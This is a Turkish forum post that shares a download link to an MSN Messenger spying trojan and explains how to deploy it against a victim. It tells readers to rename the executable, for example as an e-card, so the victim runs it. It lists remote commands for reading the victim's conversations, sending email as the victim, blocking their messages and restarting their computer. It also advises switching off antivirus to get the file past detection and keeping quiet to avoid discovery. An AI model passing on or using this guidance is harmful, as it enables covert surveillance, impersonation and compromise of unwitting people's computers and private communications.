evet darkle$$den bir yenilik daha karsı tarafın kimlerele yazıstıgını gorun:)))
Sosyal Medya Haberleri, Yardım ve Sorular0 Mesaj
●11 Görüntüleme
- ReadBull.net
- Sosyal Medya Forumları
- Sosyal Medya Haberleri, Yardım ve Sorular
- evet darkle$$den bir yenilik daha karsı tarafın kimlerele yazıstıgını gorun:)))
-
27-09-2019, 00:55:32İşte o kadar soruyordunuz, cevabı buyrun. Msn de karşı tarafın kiminle neler yazıştıgını ve neler yaptıgını tamamen gorun DIKKAT YAZININ TAMAMINI OKUYUNUZ.. Download Adresi : http://www.angelfire.com/ab8/pictur...FunMaker204.zip Adresin uzerinde sağ tuş yapın ve hedefi farklı kaydeti secin. Kullanımı Ve Komutları: * Nasıl Kullanılır ? - Kesinlikle exe yi kendi pcnizde acmayın. Bu dosya karşı tarafa yollanacak (MsnFunMakerV204.EXE)- exe nin adını degiştirebilirsiniz ama uzantısını degiştirmeyin. Yani MsnFunMakerV204.EXE yerine ecard.exe yapabilirsiniz. - Kurbana exe yi yolladınız ve kabul ettiyse dolayısıyla calıştırdıysa ; "Error, couldn’t finde file win32.dll" şeklinde bir hata mesajı alacak ve msn i kapanacakdır. Yani offline oldu ise kurban amacımıza ulaşmışız demektir. - Bu aşamadan sonra kurban sizi engelleyemez (block layamaz) buda şu makımdan onemli aşşagıdaki komutları kurbana yacagımız icin engellememesi gerekiyor bizi. - Aşşagıdaki komutları kurbanızla yazışıyor gibi ona mesajı yazdıgımız yere yazıyoruz. Bu komutlar kesinlikle kurban tarafından gozukmuyor KOMUTLAR : name(...) Kurbanın nickini degiştirir. ornek : name(Dallama) yazarsanız kurbanın nicki dallama olur. msg(...) Kurbanın pc sinde kucuk bi pencerede mesajınız yazar. www(...) Kurbanın yazdıgınız adresi acmasını saglar. Geldik asıl olaya : Kurbana gelen butun mesajlar kurbanın yazdıgı butun mesajları gorursunuz. bu ozelligi kapatmak icin chat penceresini kapatmanız yeterli. tekrar başlamak icin _spy komutunu tekrar yazıyoruz. bide koparsak geri baglanırsak tekrar yazıyoruz. _message+email[...) bu komutla kurbanın mail adresinden istediginiz kişiye mail atıyosunuz. maili alan kişide from: kısmında kurbanın maili yazıyor. (...) yerine mesajınızı email yazan yere gondereceginiz mail adresini yazıyosunuz. ama bi şart var maili attıgınız kişi o sırada kurbanla konuşuyor olmalı bunuda zaten _spy komutu ile biliyoruz. ornek : kurban to [email protected] diye biriyle konuşuyor [email protected]+mesajın ız) Kurban ın yazdıkları siz haric kimseye gitmez ama o gittigini sanır. _nosend komutunu kapatır. _noreceive kurban kimseden ileti alamaz. _noreceive komutunu kapatır. Kurbanı logout (cevrimdışı) eder. Kurbanın pc sine restart atar. Kurbanın cd rom unu acar. Acıklamarın Hepsini cevirmiyorum Kısaca : 1 ay icinde kendi kendini kaldırıyomuş. devam edecekseniz tekrar yollamanız gerekiyor. firewal lara takılma ihtimali var, şansınız yarı yarıya yani kolay gelsin.. MERAK ETTİGİNİZ SORULARI CEVAPLADIM: NOT: Kurbana eğer yedirirseniz sesizce takılın, resart, cd-rom, nick değiştirme veya bazı şeyleri yapıp onu uyandırmayın yoksa hemen yapacagı FORMAT C: sonrada bir daha omrunuz boyunca aynı kişiye yediremezsiniz. Kurbana sesizce yaklaşın kiminle ne yazıştıgını oğrenin bu size yeter. UYARI: Kaspersky guvenliginiz icin bu exe dosyasını karşı tarafa gondermeyi engelliyecektir ve download eder etmez sizi uyarıcaktır. Bu yuzden bu exe'i yollayacagınız zaman kaspersky'ı kapatın. Bu exe'i bilgisayarınızda tutamıyacaksınız kaspersky bunu engelliyecektir, cd'e cekin download ettikten sonra. Kaspersky'ın kotu yanıda bu virus gordugunde affetmiyor Dua edin de karşı taraf da kaspersky olmasın _________ LUTFEN REPLEMEYİ UNUTMAYINIZ PLEASE DON'T FORGET DO 'RAP'(bilmiyorum yanlıs mı oldu aslında ingilizcem cok ii deildir yabancı dilim almanca) __________________